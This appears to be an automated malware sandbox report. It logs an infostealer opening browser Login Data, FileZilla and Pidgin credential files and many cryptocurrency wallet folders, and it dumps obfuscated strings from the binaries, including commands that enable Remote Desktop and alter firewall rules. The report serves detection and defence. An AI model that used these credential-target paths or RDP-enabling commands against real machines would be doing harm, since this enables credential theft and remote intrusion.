                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\nKdArGRZUpagxJAqIbvceYSOcgMpCBWuiufCINblUxDGnbWFkFRiMrGhWplaJLymBPfIuEu\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\ee29ea508b\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SysWOW64\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\nKdArGRZUpagxJAqIbvceYSOcgMpCBWuiufCINblUxDGnbWFkFRiMrGhWplaJLymBPfIuEu\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\ee29ea508b\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SysWOW64\.purple\accounts.xml
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml
                          Source: Yara matchFile source: 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 6148.tmp.ssg.exe PID: 4040, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 17.0.6148.tmp.ssg.exe.7b0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000011.00000000.1536966434.00000000007B2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 6148.tmp.ssg.exe PID: 4040, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exe, type: DROPPED
                          Source: explorer.exe, 00000005.00000003.1588276592.000000000A1EE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: net start termservice
                          Source: explorer.exe, 00000005.00000003.1588276592.000000000A1EE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                          Source: 759D.tmp.gfx.exeString found in binary or memory: net start termservice
                          Source: 759D.tmp.gfx.exe, 00000012.00000002.1601006175.0000000000501000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: net start termservice
                          Source: 759D.tmp.gfx.exe, 00000012.00000002.1601006175.0000000000501000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                          Source: 759D.tmp.gfx.exe, 00000012.00000000.1589456273.0000000000501000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: net start termservice
                          Source: 759D.tmp.gfx.exe, 00000012.00000000.1589456273.0000000000501000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                          Source: 759D.tmp.gfx.exe, 00000012.00000003.1594131781.0000000006A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: net start termservice
                          Source: 759D.tmp.gfx.exe, 00000012.00000003.1594131781.0000000006A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                          Source: Gxtuum.exeString found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 00000013.00000002.1602351939.0000000000351000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 00000013.00000002.1602351939.0000000000351000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 